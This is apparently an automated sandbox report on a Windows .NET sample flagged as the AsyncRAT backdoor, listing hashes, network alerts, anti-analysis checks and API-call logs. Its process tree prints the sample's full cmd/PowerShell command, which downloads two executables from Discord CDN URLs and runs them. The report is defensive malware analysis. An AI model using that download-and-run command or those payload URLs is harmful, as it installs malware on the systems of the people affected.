Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 24, 2021, 12:26 p.m.	Aug. 24, 2021, 12:33 p.m.

Size	974.9KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`abad27b663c16a7458ce9bf4e21b9989`
SHA256	`bd535149d1a579080708482ee5e4789a83dc33f9e50d27c20624333de5299670`
CRC32	`12441A56`
ssdeep	`6144:KRbPgxNUKolPCKZxeUkxChx4ZfAb7nC0WEG05iTeHZ:7xenPV/kxChx4S95d5`
PDB Path	C:\Users\Administrator\Desktop\WindowsAPI.pdb
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

mine.exe "C:\Users\test22\AppData\Local\Temp\mine.exe"
1944
- cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', '%Temp%\\WindowsHelper.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsHelper.exe' & exit
  2248
  - powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', 'C:\Users\test22\AppData\Local\Temp\\WindowsHost.exe')
    2792
  - powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', 'C:\Users\test22\AppData\Local\Temp\\WindowsHelper.exe')
    732
  - powershell.exe powershell Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\\WindowsHost.exe'
    2528
  - powershell.exe powershell Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\\WindowsHelper.exe'
    1644

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.134.233

IP Address	Status	Action
172.67.188.154	Active	Moloch
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49170 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49167 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.102:49170 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Queries for the computername (24 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2021, 12:26 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 24, 2021, 12:18 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:18 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:19 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:25 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:26 p.m.			0	0
IsDebuggerPresent Aug. 24, 2021, 12:26 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 141 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000259da0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000266e50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000266e50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002676a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002676a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002676a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002676a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ace10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ace10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ace10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002677f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000267630 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad3c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ad3c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ce460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ce460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000026e360 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002faa60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002faa60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002faa60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876a50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876a50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876b30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876b30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876b30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2021, 12:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b876b30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\Users\Administrator\Desktop\WindowsAPI.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 24, 2021, 12:18 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe
suspicious_features	GET method with no useragent header				suspicious_request	GET https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe

Performs some HTTP requests (2 events)

request	GET https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe
request	GET https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 736 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000610000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1541000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1bdb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000aa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1542000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1544000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1544000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1544000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1544000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91daa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ed0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91e5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91e86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ed1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dcd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91da2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
